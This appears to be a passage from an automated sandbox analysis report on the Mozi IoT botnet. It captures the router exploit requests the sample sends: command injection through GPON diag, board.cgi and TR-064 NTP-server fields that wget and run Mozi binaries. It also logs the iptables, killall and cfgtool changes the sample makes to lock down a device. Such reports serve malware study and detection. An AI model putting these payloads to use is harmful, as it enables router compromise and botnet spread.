                                                              Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              148192.168.2.235776626.194.72.2298080
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.266194105 CET120OUTGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                                                              Data Raw:
                                                              Data Ascii:


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              149192.168.2.234765630.227.89.815555
                                                              TimestampBytes transferredDirectionData
                                                              Dec 11, 2024 00:42:56.266222954 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                              Host: 127.0.0.1:5555
                                                              User-Agent: Hello, world
                                                              SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                              Content-Type: text/xml
                                                              Content-Length: 640
                                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                              Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                              System Behavior

                                                              Start time (UTC):23:42:49
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:/tmp/Mozi.m.elf
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:42:49
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:42:49
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:42:49
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:42:49
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:42:49
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:42:49
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/bin/killall
                                                              Arguments:killall -9 telnetd utelnetd scfgmgr
                                                              File size:32024 bytes
                                                              MD5 hash:cd2adedbee501869ac691b88af39cd8b

                                                              Start time (UTC):23:42:50
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:42:50
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:42:50
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 41913 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p tcp --destination-port 41913 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 41913 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p tcp --source-port 41913 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 41913 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 41913 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 41913 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 41913 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 41913 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p tcp --dport 41913 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 41913 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p tcp --sport 41913 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 41913 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I PREROUTING -t nat -p tcp --dport 41913 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 41913 -j ACCEPT"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:06
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 41913 -j ACCEPT
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:42:55
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:00
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:05
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:10
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:10
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:10
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:10
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:10
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:10
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:10
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:10
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:11
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/tmp/Mozi.m.elf
                                                              Arguments:-
                                                              File size:4956856 bytes
                                                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
                                                              Path:/usr/sbin/iptables
                                                              Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                              File size:99296 bytes
                                                              MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                              Start time (UTC):23:43:12
                                                              Start date (UTC):10/12/2024
